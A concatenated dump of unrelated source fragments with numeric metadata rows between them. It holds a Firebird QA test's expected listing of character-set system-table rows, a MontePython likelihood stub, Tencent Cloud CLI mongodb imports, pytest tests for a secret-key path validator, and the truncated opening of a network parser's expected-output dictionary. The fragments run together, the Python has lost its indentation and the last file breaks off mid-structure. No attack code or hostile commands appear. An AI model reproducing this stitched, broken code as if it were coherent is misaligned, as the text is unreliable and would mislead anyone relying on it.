RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 3
RDB$SECURITY_CLASS SQL$185
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME UTF8
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME UTF8
RDB$CHARACTER_SET_ID 4
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 4
RDB$SECURITY_CLASS SQL$186
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME SJIS_0208
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME SJIS_0208
RDB$CHARACTER_SET_ID 5
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$187
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME EUCJ_0208
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME EUCJ_0208
RDB$CHARACTER_SET_ID 6
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$188
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS737
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS737
RDB$CHARACTER_SET_ID 9
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$208
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS437
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS437
RDB$CHARACTER_SET_ID 10
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$189
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS850
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS850
RDB$CHARACTER_SET_ID 11
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$190
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS865
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS865
RDB$CHARACTER_SET_ID 12
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$191
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS860
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS860
RDB$CHARACTER_SET_ID 13
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$204
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS863
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS863
RDB$CHARACTER_SET_ID 14
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$206
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS775
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS775
RDB$CHARACTER_SET_ID 15
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$209
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS858
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS858
RDB$CHARACTER_SET_ID 16
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$210
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS862
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS862
RDB$CHARACTER_SET_ID 17
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$211
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS864
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS864
RDB$CHARACTER_SET_ID 18
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$212
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME NEXT
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME NEXT
RDB$CHARACTER_SET_ID 19
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$220
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_1
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_1
RDB$CHARACTER_SET_ID 21
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$192
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_2
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_2
RDB$CHARACTER_SET_ID 22
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$193
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_3
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_3
RDB$CHARACTER_SET_ID 23
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$194
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_4
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_4
RDB$CHARACTER_SET_ID 34
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$195
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_5
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_5
RDB$CHARACTER_SET_ID 35
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$196
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_6
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_6
RDB$CHARACTER_SET_ID 36
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$197
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_7
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_7
RDB$CHARACTER_SET_ID 37
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$198
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_8
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_8
RDB$CHARACTER_SET_ID 38
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$199
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_9
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_9
RDB$CHARACTER_SET_ID 39
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$200
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_13
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_13
RDB$CHARACTER_SET_ID 40
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$201
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KSC_5601
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KSC_5601
RDB$CHARACTER_SET_ID 44
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$224
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS852
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS852
RDB$CHARACTER_SET_ID 45
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$202
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS857
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS857
RDB$CHARACTER_SET_ID 46
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$203
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS861
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS861
RDB$CHARACTER_SET_ID 47
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$205
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS866
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS866
RDB$CHARACTER_SET_ID 48
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$213
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS869
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS869
RDB$CHARACTER_SET_ID 49
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$214
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME CYRL
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME CYRL
RDB$CHARACTER_SET_ID 50
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$207
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1250
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1250
RDB$CHARACTER_SET_ID 51
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$215
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1251
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1251
RDB$CHARACTER_SET_ID 52
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$216
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1252
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1252
RDB$CHARACTER_SET_ID 53
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$217
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1253
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1253
RDB$CHARACTER_SET_ID 54
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$218
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1254
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1254
RDB$CHARACTER_SET_ID 55
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$219
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME BIG_5
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME BIG_5
RDB$CHARACTER_SET_ID 56
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$225
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GB_2312
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GB_2312
RDB$CHARACTER_SET_ID 57
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$226
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1255
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1255
RDB$CHARACTER_SET_ID 58
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$221
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1256
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1256
RDB$CHARACTER_SET_ID 59
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$222
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1257
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1257
RDB$CHARACTER_SET_ID 60
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$223
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KOI8R
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KOI8R
RDB$CHARACTER_SET_ID 63
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$227
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KOI8U
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KOI8U
RDB$CHARACTER_SET_ID 64
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$228
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1258
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1258
RDB$CHARACTER_SET_ID 65
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$229
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME TIS620
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME TIS620
RDB$CHARACTER_SET_ID 66
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$230
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GBK
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GBK
RDB$CHARACTER_SET_ID 67
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$231
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME CP943C
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME CP943C
RDB$CHARACTER_SET_ID 68
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$232
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GB18030
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GB18030
RDB$CHARACTER_SET_ID 69
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 4
RDB$SECURITY_CLASS SQL$233
RDB$OWNER_NAME SYSDBA
Records affected: 52
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
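# A hedged usage note (assumes the firebird-qa pytest plugin and a local
# Firebird 3.0+ server are configured): this single check can be run with
#   pytest -q tests/functional/basic/db/test_02.py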
| 114.037481 | 288 | 0.173935 | 2,779 | 76,063 | 4.435049 | 0.082764 | 0.118134 | 0.127789 | 0.081704 | 0.81712 | 0.809168 | 0.809168 | 0.809168 | 0.686085 | 0.650385 | 0 | 0.049531 | 0.810749 | 76,063 | 666 | 289 | 114.208709 | 0.806669 | 0.003852 | 0 | 0.616554 | 0 | 0 | 0.993558 | 0.064389 | 0 | 0 | 0 | 0 | 0.001689 | 1 | 0.001689 | false | 0 | 0.003378 | 0 | 0.005068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9d7c1546f4b4d12f1d60d3da66395382518370f4 | 109 | py | Python | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 69 | 2018-04-20T07:38:33.000Z | 2022-03-11T06:55:36.000Z | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 263 | 2018-05-20T21:58:11.000Z | 2022-03-30T21:45:48.000Z | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 78 | 2018-04-21T13:11:54.000Z | 2022-02-01T01:57:31.000Z | from montepython.likelihood_class import Likelihood_clik
class Planck15_lensing(Likelihood_clik):
pass
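# A hedged usage note (the experiment-list syntax is MontePython convention;
# exact parameter files are assumptions): the empty subclass is enough because
# Likelihood_clik loads the clik lensing file named in this likelihood's .data
# file, and a run enables it via
#   data.experiments = ['Planck15_lensing']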
| 18.166667 | 56 | 0.844037 | 13 | 109 | 6.769231 | 0.692308 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.119266 | 109 | 5 | 57 | 21.8 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
9d9f55632b04f218d6c850bf75ac8564eb9af7a3 | 227 | py | Python | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from tccli.services.mongodb.mongodb_client import register_arg
from tccli.services.mongodb.mongodb_client import get_actions_info
from tccli.services.mongodb.mongodb_client import AVAILABLE_VERSION_LIST
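# A hedged note (loader wiring is an assumption): tccli discovers each service
# package through re-exports like these, so callers of the mongodb command
# group only need
#   from tccli.services.mongodb import register_arg, get_actions_info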
| 45.4 | 72 | 0.845815 | 32 | 227 | 5.75 | 0.53125 | 0.146739 | 0.277174 | 0.391304 | 0.701087 | 0.701087 | 0.701087 | 0 | 0 | 0 | 0 | 0.004762 | 0.07489 | 227 | 4 | 73 | 56.75 | 0.871429 | 0.092511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
9da88779ce06e2e9bcf78374320982a9fa1d65d5 | 1,033 | py | Python | tests/upload/test_secret_key_pattern.py | kave/enforcer-reloaded | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 4 | 2019-09-09T19:59:45.000Z | 2021-01-20T07:24:38.000Z | tests/upload/test_secret_key_pattern.py | kave/enforcer-reloaded | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 67 | 2019-08-01T13:29:31.000Z | 2021-08-01T11:17:24.000Z | tests/upload/test_secret_key_pattern.py | kave/enforcer | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 2 | 2019-10-03T03:59:09.000Z | 2021-08-18T06:42:29.000Z | from pytest import raises
from upside.enforcer.upload.util import secret_key_pattern
def test_good_pattern():
assert secret_key_pattern('/test/test') == '/test/test'
assert secret_key_pattern('/test_test.-test/test.test-test') == '/test_test.-test/test.test-test'
def test_value_error():
with raises(Exception) as err:
secret_key_pattern('/test/')
assert err.typename == 'ValueError'
def test_bad_pattern():
with raises(ValueError):
secret_key_pattern('/test/')
with raises(ValueError):
secret_key_pattern('test')
with raises(ValueError):
secret_key_pattern('test/')
with raises(ValueError):
secret_key_pattern('test/test')
with raises(ValueError):
secret_key_pattern('test_test.-test/test.test-test')
with raises(ValueError):
secret_key_pattern('/test_/test.-test/test.test-test')
with raises(ValueError):
secret_key_pattern('/test/test/')
with raises(ValueError):
secret_key_pattern('/te$t/test')
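# A hedged sketch of the contract these tests pin down (the real validator
# lives in upside.enforcer.upload.util and may be implemented differently):
# exactly two non-empty segments of word characters, dots, and hyphens, with a
# leading slash and no trailing slash.
#
#   import re
#   KEY_RE = re.compile(r'/[\w.\-]+/[\w.\-]+')
#   assert KEY_RE.fullmatch('/test/test')
#   assert not KEY_RE.fullmatch('/test/test/')
#   assert not KEY_RE.fullmatch('/te$t/test')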
| 25.195122 | 101 | 0.685382 | 132 | 1,033 | 5.106061 | 0.19697 | 0.308605 | 0.356083 | 0.379822 | 0.700297 | 0.700297 | 0.700297 | 0.700297 | 0.635015 | 0.611276 | 0 | 0 | 0.182962 | 1,033 | 40 | 102 | 25.825 | 0.798578 | 0 | 0 | 0.384615 | 0 | 0 | 0.198451 | 0.120039 | 0 | 0 | 0 | 0 | 0.115385 | 1 | 0.115385 | true | 0 | 0.076923 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9dace26c30a89ee5033ca8c9a22bcd7145413209 | 10,273 | py | Python | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z |
expected_output = {
'vrf':
{'VRF1':
{'address_family':
{'ipv4 unicast':
